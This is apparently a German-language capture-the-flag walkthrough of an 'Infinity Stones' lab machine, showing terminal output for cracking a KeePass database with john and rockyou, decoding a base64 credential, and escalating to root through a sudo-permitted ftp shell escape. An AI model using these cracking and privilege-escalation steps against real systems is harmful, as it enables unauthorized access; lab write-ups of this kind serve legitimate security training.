jenkins@ubuntu:/var/www/html/gamA00fe2012$ cat realitystone.txt
REALITYSTNE:{4542E4C233F26B4FAF6B5F3FED24280C}
Wir geben den Inhalt der Datei "realitystone.txt" aus und finden einen MD5-Hash.
Hash Type Result
4542E4C233F26B4FAF6B5F3FED24280C md5 aarti
Nach dem knacken des hashes ist es leider nicht nutzbar da der nächste Schritt eine Authentifizierung vorsieht.
------------------------------------------------------------------------------------ Wir prüfen ob es mit su oder sudo möglich ist den Benutzer zu wechseln.
jenkins@ubuntu:/var/www/html/gamA00fe2012$ su root
Password:
su: Authentication failure
jenkins@ubuntu:/var/www/html/gamA00fe2012$ su morag
Password:
su: Authentication failure
jenkins@ubuntu:/var/www/html/gamA00fe2012$ su stones
Password:
su: Authentication failure
jenkins@ubuntu:/var/www/html/gamA00fe2012$
Der Benutzer Wechsel schlägt fehl.
jenkins@ubuntu:/var/www/html/gamA00fe2012$ ss -altpn 
State     Recv-Q    Send-Q         Local Address:Port         Peer Address:Port    Process    
LISTEN    0         4096           127.0.0.53%lo:53                0.0.0.0:*                                      
LISTEN    0         128                  0.0.0.0:22                0.0.0.0:*                                      
LISTEN    0         5           127.0.0.1:631                0.0.0.0:*                                      
LISTEN    0         128                 *:80                      *:*                                      
LISTEN    0         50                  *:8080              *:*     users:(("java",pid=1119,fd=166)) 
LISTEN    0         128                     [::]:22                   [::]:*                                      
LISTEN    0         5               [::1]:631                  [::]:*                                      
LISTEN    0         128                 *:443                      *:
Wir verwenden ss, um die Netzwerkverbindungen aufzulisten.
jenkins@ubuntu:/opt$ ls
morag.kdbx script
Wir schauen uns das /opt verzeichnis an.
jenkins@ubuntu:/opt$ ls -la 
total 24
drwxr-xr-x  2 root root 4096 Sep 15  2019 .
drwxr-xr-x 24 root root 4096 Jan  2 14:32 ..
-rw-r--r--  1 root root 2558 Sep 15  2019 morag.kdbx
-rwsr-xr-x  1 root root 8304 Sep 15  2019 script
Wir finden heraus dass dem root user der /opt/script gehört und es ein SUID bit gesetzt hat.
jenkins@ubuntu:/opt$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Wir starten einen HTTP-Server auf Port 8000.
Wir laden die Datei morag.kdbx auf dem lokalen Rechner runter.
┌──(pwn)─(root㉿CCat)-[~]
└─# keepass2john morag.kdbx > hash
Wir extrahieren den Hash mit keepass2john.
┌──(pwn)─(root㉿CCat)-[~]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash 
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 16 penMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status

princesa         (morag)     

1g 0:00:00:00 DNE (2025-01-02 23:55) 7.142g/s 914.2p/s 914.2c/s 914.2C/s secret..miguel
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Wir verwenden John, um das Passwort zu knacken.
File analyse
1HDD6pvuyUuZeNucpCpz
bW9yYWc6eW9uZHU=
An98XArsp1Ncj0hAZLda
┌──(pwn)─(root㉿CCat)-[~]
└─# echo -n bW9yYWc6eW9uZHU=| base64 -d
morag:yondu
Wir dekodieren das Passwort von morag.
jenkins@ubuntu:/opt$ su morag
Password:
yondu

Privilege Escalation

Privilege Escalation
morag@ubuntu:/opt$ sudo -l
Matching Defaults entries for morag on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User morag may run the following commands on ubuntu:
(root) NPASSWD: /usr/bin/ftp
Wir prüfen die Sudo rechte vom Benutzer morag.
------------------------------------------------------------------------------------
https://gtfobins.github.io/gtfobins/ftp/
morag@ubuntu:/opt$ sudo /usr/bin/ftp
ftp> !/bin/sh
id
uid=0(root) gid=0(root) groups=0(root)
Durch gtfobins die privilige escalation war Erfolgreich !
cd /root
ls
final.txt
cat f
cat: f: No such file or directory
cat final.txt 
┬┬╔═╗┌─┐┌┐┌┌─┐┬─┐┌─┐┌┬┐┬ ┬┬  ┌─┐┌┬┐┬┌─┐┌┐┌┌─┐  ┬ ┬┌─┐┬ ┬  ┌─┐┌─┐┬ ┬┌┐┌┌┬┐  ┌┬┐┬ ┬┌─┐  ┌─┐┬┌┐┌┌─┐┬    ┌─┐┬  ┌─┐┌─┐  ┬┬
││║  │ │││││ ┬├┬┘├─┤ │ │ ││  ├─┤ │ ││ ││││└─┐  └┬┘│ ││ │  ├┤ │ ││ ││││ ││   │ ├─┤├┤   ├┤ ││││├─┤│    ├┤ │  ├─┤│ ┬  ││
oo╚═╝└─┘┘└┘└─┘┴└─┴ ┴ ┴ └─┘┴─┘┴ ┴ ┴ ┴└─┘┘└┘└─┘   ┴ └─┘└─┘  └  └─┘└─┘┘└┘─┴┘   ┴ ┴ ┴└─┘  └  ┴┘└┘┴ ┴┴─┘  └  ┴─┘┴ ┴└─┘  oo

                            ,g@@@@@@g,
                           @@@@NMMN@@@g,gggpg,
                          ]@@@`    "@@@@@@@@@@@@  ,,,,
                          ]@@@      $@@@"   "%@@@@@@@@@@g
                          ]@@@      $@@@     ]@@@@M*"*%@@@g@@@@@@g
                          ]@@@      $@@@     ]@@@L     ]@@@@@NN@@@@g
                          ]@@@      $@@@     ]@@@`     ]@@@'    ]@@@L
                          ]@@@ggg   $@@@     ]@@@`     ]@@@      $@@P
                          ]@@@@@@L  $@@@@@@  ]@@@L     ]@@@      $@@P
                          ]@@@@@  1 "%@@@@F  '%@@@@@W  $@@@,,,   $@@P
                          ]@@@@@,    $@@@L  2  ]@@@M   '%@@@@@  ]@@@@,
                      ,,,,]@@@@@@@g@@@@@@@,   ,@@@@  3  $@@@'   '%@@@
                  ,g@@@@@@@@@@"%%N@@NM*%@@@@@@@@@@@@,,,,@@@@L 4  ]@@@F
                 g@@@M*"""%@@@          '"MMMMM'"%@@@@@@@@@@@@g,,g@@@M
                j@@@F     ]@@@                     "' "%@@@@@@@@P
                ]@@@L     ]@@@              ,ggggg,          ''"}$@@P
                ]@@@L  g@@@@@@            g@@@@@@@@@g      j@@@  $@@P
                ]@@@L  %NN@@@@           $@@@C   ]@@@@     ]@@@L $@@P
                ]@@@L     '%M"          j@@@F  6  ]@@@     ]@@@L $@@P
                ]@@@L                   '@@@@     $@@@     ]@@@L $@@P
                ]@@@gg@@@@w              ]@@@@ggg@@@@L     ]@@@L]@@@L
                 %@@@@@@NM"               '%@@@@@@@M`     ;@@@M j@@@L
                 ]@@@@     ,@@g               ''`        #@@@M )@@@M
                 ]@@@L  5  $@@@                          ``,@@@@F
                  ]@@@Wggg@@@@F                           ,g@@@@@`
                   "%@@@@@@@@@@@@@@@g                  ,@@@@@@@@@
                       '""*%N@@@@@@@M                   *MF" '$@@@
                            @@@@                          gg, j@@@,
                           $@@@`                         j@@@L %@@@
                          .@@@@                           %@@@ ]@@@

			SULSTNE:{56F06B4DAC14CE346998483989ABFF16} 
--Contact Undersigned to share your feedback with HACKING ARTICLES Teams-

AArti Singh: https://www.linkedin.com/in/aarti-singh-353698114/

Kavish Tyagi: Tyagi_kavish_ Twitter
Wir lesen die root.txt und bekommen die flag.

Flags

cat root.txt
SULSTNE:{56F06B4DAC14CE346998483989ABFF16}
cat .user.txt

%
,%&&&%#.
% *&&&%&&&%&&&%&&&%
% &&&%& .%&&&%
% &&&%# %&&&%
% /&&&%& &&&%
% %&%/ %&&&*
% .& (%%(, ,(&&&* %&&
% &&&% %&&&%&&&%&&&%&&%&%# &&&
% &&&%&&&%&&& #&&&%&&&&&* &&&%&&&%
% &&&%&&&%&&&%&&&%& /&&&%&&&%&&&%&&
% &&&%&&&% &&&%&&&%
% %&&&%&&& /&&&%&&&%&
% &.%&&&% %&&&% &&&%& %&/*&
% &&&%&&&%&& %&&&%# %%&&&% %&&&%&&&%&
% /&%&/ *&&&%&& %&&&%&&%& &&&%&&. %&&&.
% &&&% &&&%& %%%% .&&&
% &&&% &&&
% %&&&. *&%&&&%&&&%&&&%&&&%&&&%&&&%&&&&%&&& /&&&(
% /&& #&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&&%&&&%&&&* %&&
% &&&% ,&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&& %&%
% &&& %&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&& %&&
% &&& &&&%&&&%&&&%&&&%&%& %&&&%&&&%&&&%& &&
% %&&&% &&&%&&&%&&&%&&&%& &&&%&&&%&&&%&% &%&#
% &&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&
% &%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%
% &&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&
% *&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&
% &&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&
% #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%(